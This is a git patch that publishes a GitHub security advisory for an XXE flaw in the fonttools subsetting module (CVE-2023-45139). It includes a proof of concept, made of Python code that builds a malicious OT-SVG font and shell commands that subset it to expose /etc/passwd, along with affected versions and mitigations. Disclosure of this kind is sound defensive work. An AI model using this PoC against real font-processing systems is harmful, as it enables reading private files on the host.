From eb20704735789e4a2a60af2621ac7a8176b6bcd6 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 9 Jan 2024 16:02:26 +0000 Subject: [PATCH] Publish GHSA-6673-4983-2vx5 --- .../GHSA-6673-4983-2vx5.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2024/01/GHSA-6673-4983-2vx5/GHSA-6673-4983-2vx5.json diff --git a/advisories/github-reviewed/2024/01/GHSA-6673-4983-2vx5/GHSA-6673-4983-2vx5.json b/advisories/github-reviewed/2024/01/GHSA-6673-4983-2vx5/GHSA-6673-4983-2vx5.json new file mode 100644 index 00000000000..0aea80b7a1c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6673-4983-2vx5/GHSA-6673-4983-2vx5.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6673-4983-2vx5", + "modified": "2024-01-09T16:01:10Z", + "published": "2024-01-09T16:01:10Z", + "aliases": [ + "CVE-2023-45139" + ], + "summary": "fonttools XML External Entity Injection (XXE) Vulnerability", + "details": "### Summary\n\nAs of `fonttools>=4.28.2` the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. \n\nThis allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. \n\n### PoC\n\n\nThe vulnerability can be reproduced following the bellow steps on a unix based system.\n\n1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised `/etc/passwd` for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.\n\n```python\n\nfrom string import ascii_letters\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\nfrom fontTools.ttLib import newTable\n\n\nXXE_SVG = \"\"\"\\\n\n]>\n\n \n &test;\n \n\n\"\"\"\n\ndef main():\n # generate a random TTF font with an SVG table\n glyph_order = [\".notdef\"] + list(ascii_letters)\n pen = TTGlyphPen(glyphSet=None)\n pen.moveTo((0, 0))\n pen.lineTo((0, 500))\n pen.lineTo((500, 500))\n pen.lineTo((500, 0))\n pen.closePath()\n glyph = pen.glyph()\n glyphs = {g: glyph for g in glyph_order}\n\n fb = FontBuilder(unitsPerEm=1024, isTTF=True)\n fb.setupGlyphOrder(glyph_order)\n fb.setupCharacterMap({ord(c): c for c in ascii_letters})\n fb.setupGlyf(glyphs)\n fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})\n fb.setupHorizontalHeader()\n fb.setupOS2()\n fb.setupPost()\n fb.setupNameTable({\"familyName\": \"TestSVG\", \"styleName\": \"Regular\"})\n\n svg_table = newTable(\"SVG \")\n svg_table.docList = [\n (XXE_SVG, 1, 12)\n ]\n fb.font[\"SVG \"] = svg_table\n\n fb.font.save('poc-payload.ttf')\n\nif __name__ == '__main__':\n main()\n\n```\n\n2. Subset the font with an affected version of fontTools - we tested on `fonttools==4.42.1` and `fonttools==4.28.2` - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):\n\n```shell\npyftsubset poc-payload.ttf --output-file=\"poc-payload.subset.ttf\" --unicodes=\"*\" --ignore-missing-glyphs\n```\n\n3. Read the parsed SVG table in the subsetted font:\n\n```shell\nttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx\n```\n\nObserved the included contents of the `/etc/passwd` file. \n\n### Impact\n\nNote the final severity is dependant on the environment fontTools is running in.\n\n- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on\n\n\n\n### Possible Mitigations \n\nThere may be other ways to mitigate the issue, but some suggestions:\n\n1. Set the `resolve_entities=False` flag on parsing methods\n2. Consider further methods of disallowing doctype declarations\n3. Consider recursive regex matching\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fonttools" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.28.2" + }, + { + "fixed": "4.43.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5" + }, + { + "type": "WEB", + "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/fonttools/fonttools" + }, + { + "type": "WEB", + "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-09T16:01:10Z", + "nvd_published_at": null + } +} \ No newline at end of file